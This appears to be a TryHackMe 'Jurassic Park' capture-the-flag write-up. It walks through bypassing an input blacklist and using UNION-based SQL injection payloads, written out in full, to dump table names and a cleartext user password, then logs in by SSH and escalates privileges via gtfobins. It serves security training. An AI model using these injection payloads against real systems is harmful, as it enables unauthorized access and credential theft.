🦖THM Jurassic Park

Introduction

This medium-hard task will require you to enumerate the web application, get credentials to the server and find four flags hidden around the file system. Oh, Dennis Nedry has helped us to secure the app too.

You'll also want to turn up your device's volume (firefox is recommended). So, deploy the VM and get hacking.

Step 1 – Enumeration

As usual, scan the machine IP to find any open port. Result don’t show any interesting port other than ssh and http.

Moving to directory, result show some interesting path which robots.txt. But robots are rabbit hole. yaks

Step 2 – Proof SQL

Moving to landing page, it appears to have another path that cannot be detected by scanner.

Click into online shop, it will redirect to shop.php and it shown like below.

Reading more into the source code, I found juicy things here. ?id=1

This method appear to have sql injection.

Let testing with default injection which '.

Oh no, it block the action, let manually search any other interesting part other than 1,2 and 3.

As we can see, this development package are some information to protect the website from SQL injection where it not allowed ' # DROP – username @ ---- action and if found it will show like above message.

Since SQL injection not only limited to this, let try asterisk (*) as it mean all in SQL.

We manage to proof this website prone to injections. Since it just sanitize input ' but not *.

Step 3 – SQL Injection

Not so familiar with SQLi, I need to reopen back my notes from previous learning on port swinger. Let start by checking number of available column. From here, we can inject instruction to perform our action and gather the information.

order by 1,2,3,4,5,6 – return false. That means, it have 5 column.

Next, use union to see all the information being distribute and places.

From the union command, 1 and 3 are not the place to put injection since it not appear and showing the price that might have some limitation. We can use 2,4 and 5. For this website, will use column 4 since it appear to have long space that enough for read information.

Since we know where to put injection, let find the database name and it version.

union select all 1, database(),3,version(),5

We know the database name and it version, let see what tables it have in the database.

union select 1,2,3 ,group_concat(table_name),5 from information_schema.tables where table_schema = database()

It show 2 tables which are items and users. Next, check the column in users table.

union select 1,2,3 ,group_concat(column_name),5 from information_schema. column where table_schema = database() and table_name = "users"

We can see 3 column represent id, username and password inside users table. Since we cannot drop, use words username and use @. We only can read it through using this method.

union select 1,2,3 ,password,5 from 'users'

We manage to read clear text password. But this password belongs to who?. Reading the instructions, it refer to one individual person that can be useful.

Step 4 – User Access

Since we have username and password, let connect to ssh.

From here, we manage to get first flag. Reading the other file, it appears to have simple bash script to read flag5. (Wil not use this method for privilege escalation)

Next, checking into bash_history and also viminfo which can be read. Here we found flag2 and flag3. For flag4, the location in /tmp which actually no available due to auto delete in certain minutes/times.

Step 5 – Privilege Escalation

We have the password for this user, let check permission.

According to gtfobin, this action can be done using this script.

We manage to read flag5.

Thanks for reading. Hope you enjoyed this.

Learning

1. Other methods for SQL injection

2. SCP escalation by gtfobin

3. SCP escalation by copy into our machine.